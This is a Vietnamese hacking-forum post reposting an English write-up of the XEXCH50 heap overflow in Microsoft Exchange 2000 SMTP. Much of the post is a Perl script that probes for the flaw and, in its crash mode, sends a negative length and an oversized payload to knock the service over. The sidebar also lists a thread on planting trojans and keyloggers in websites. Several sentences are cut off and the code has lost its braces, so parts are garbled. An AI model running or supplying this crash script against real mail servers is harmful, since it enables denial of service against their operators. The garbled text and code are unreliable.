Display results as :

Rechercher Advanced Search

Latest topics
» Tuyệt Kỹ Đong Giai Chân Kinh (tuyệt Kỹ cua trai)
Thu Aug 23, 2012 5:38 am by Admin

» Tuyệt kỹ cua giai
Thu Aug 23, 2012 5:36 am by Admin

» NETCAT.........
Mon Aug 13, 2012 6:35 am by Admin

» Bảo mật CSDL bằng phương pháp mã hóa.
Tue Apr 17, 2012 10:04 pm by Admin

» Hàm mã hóa MD5 bằng JavaScript
Tue Apr 17, 2012 10:03 pm by Admin

» Giá của món quà
Fri Apr 13, 2012 6:01 am by Admin

» Sẽ chỉ yêu ai?
Fri Apr 13, 2012 6:01 am by Admin

» Cách đọc bảng chữ cái!
Thu Apr 12, 2012 10:37 pm by Admin

» Gắn trojan, keylog, virus vào website, forum
Tue Apr 10, 2012 1:14 am by Admin


free forum

Khai thác lỗi tràn heap trên Microsoft Exchange 2000

Go down

Khai thác lỗi tràn heap trên Microsoft Exchange 2000

Post  Admin on Wed Mar 28, 2012 11:32 pm

Đôi nét về lỗi này:
On October 15th, Microsoft released an advisory stating that both Exchange
5.5 and Exchange 2000 were vulnerable to a denial of service attack in
the code which processes extended verb requests. This advisory also
stated that Exchange 2000 was vulnerable to a buffer overrun that would
allow a remote attacker to execute the code in the context of the SMTP

The supported extended verb requests can be determined by sending the
"EHLO" command to the SMTP service. After checking both the 5.5 and 2000
versions of the Exchange SMTP service, it was obvious that the problem
had to be with the XEXCH50 verb. A quick google search and I was able to
find a quick description of this verb:


"Allows transfer of binary data with Exchange specific recipient
information eg plain text only versus MIME, etc). If accepted, receiver
SMTP servers sends 354 Send Binary data and sending SMTP server sends the
number of bytes as the first parameter on the XEXCH50 command. Once these
bytes are sent, the receiving SMTP server sends an acknowledgment"

After a few minutes of digging on google groups, I came across a sample
TCP session showing how the XEXCH50 verb is used. This verb is used to
transfer messages between Exchange servers using their native envelope
format. The syntax of the verb is:


Where X is the length of the message and Y always seems to be the number 2
(although other small integer values work as well). The denial of service
can be triggered by sending XEXCH50 request with a massive number of
bytes for the first argument. This forces the remote server to allocate
that specified amount of space and can easily be used to drain all
available memory from a system. Once Exchange runs low on memory, it no
longer processes incoming requests, leading to a quick and easy remote
denial of service.

If a negative value is passed as the first argument of the XEXCH50 verb
request, the server will not allocate any memory but still accept data.
This can be used to clobber the heap and eventually execute arbitrary

It ends up that the heap area that is overwritten is used by the
GetServiceConfigInfoSize routine and many of the subroutines that it
calls. After testing more than two hundred combinations of data size,
data content, pre-allocation, multiple connections, and alternate trigger
paths, I was unable to find a set that would allow for reliable
exploitation. Using the Snapshot/Revert functions of VMWare allowed me to
test different data combinations in the exact same running process. Just
changing a few bytes deep into the data resulted in a change in the
location and type of crash. Even using the exact same data will result in
smaller set of completely different crashes using different chunks of the

So for the moment, I have no working exploit. More than likely someone
will find the perfect set of parameters and be able to write a reliable
exploit, but in the meantime I am going to burn my time on something more

You can find a small perl script that reproduces the crash and tests for
the vulnerability at the URL below.


#!/usr/bin/perl -w

# - hdm[at]

use strict;
use IO::Socket;

my $host = shift() || usage();
my $mode = shift() || "CHECK";
my $port = 25;

if (uc($mode) eq "CHECK") { check() }
if (uc($mode) eq "CRASH") { crash() }


sub check
my $s = SMTP($host, $port);
if (! $s)
print "[*] Error establishing connection to SMTP service.\n";

print $s "XEXCH50 2 2\r\n";
my $res = <$s>;
close ($s);

# a patched server only allows XEXCH50 after NTLM authentication
if ($res =~ /authentication/i)
print "[*] This server has been patched or is not vulnerable.\n";

print "[*] This system is vulnerable: $host:$port\n";


sub crash
my $s = SMTP($host, $port);
if (! $s)
print "[*] Error establishing connection to SMTP service.\n";

# the negative value allows us to overwrite random heap bits
print $s "XEXCH50 -1 2\r\n";
my $res = <$s>;

# a patched server only allows XEXCH50 after NTLM authentication
if ($res =~ /authentication/i)
print "[*] This server has been patched or is not vulnerable.\n";

print "[*] Sending massive heap-smashing string...\n";
print $s ("META" x 16384);

# sometimes a second connection is required to trigger the crash
$s = SMTP($host, $port);


sub usage
print STDERR "Usage: $0 <host> [CHECK|CRASH]\n";


sub SMTP
my ($host, $port) = @_;
my $s = IO::Socket::INET->new
PeerAddr => $host,
PeerPort => $port,
Proto => "tcp"
) || return(undef);

my $r = <$s>;
return undef if !$r;

if ($r !~ /Microsoft/)
print STDERR "[*] This does not look like an exchange server: $r\n";

print $s "HELO X\r\n";
$r = <$s>;
return undef if !$r;

print $s "MAIL FROM: DoS\r\n";
$r = <$s>;
return undef if !$r;

print $s "RCPT TO: Administrator\r\n";
$r = <$s>;
return undef if !$r;



Tổng số bài gửi : 782
Join date : 2009-08-15

View user profile

Back to top Go down

Back to top

Permissions in this forum:
You cannot reply to topics in this forum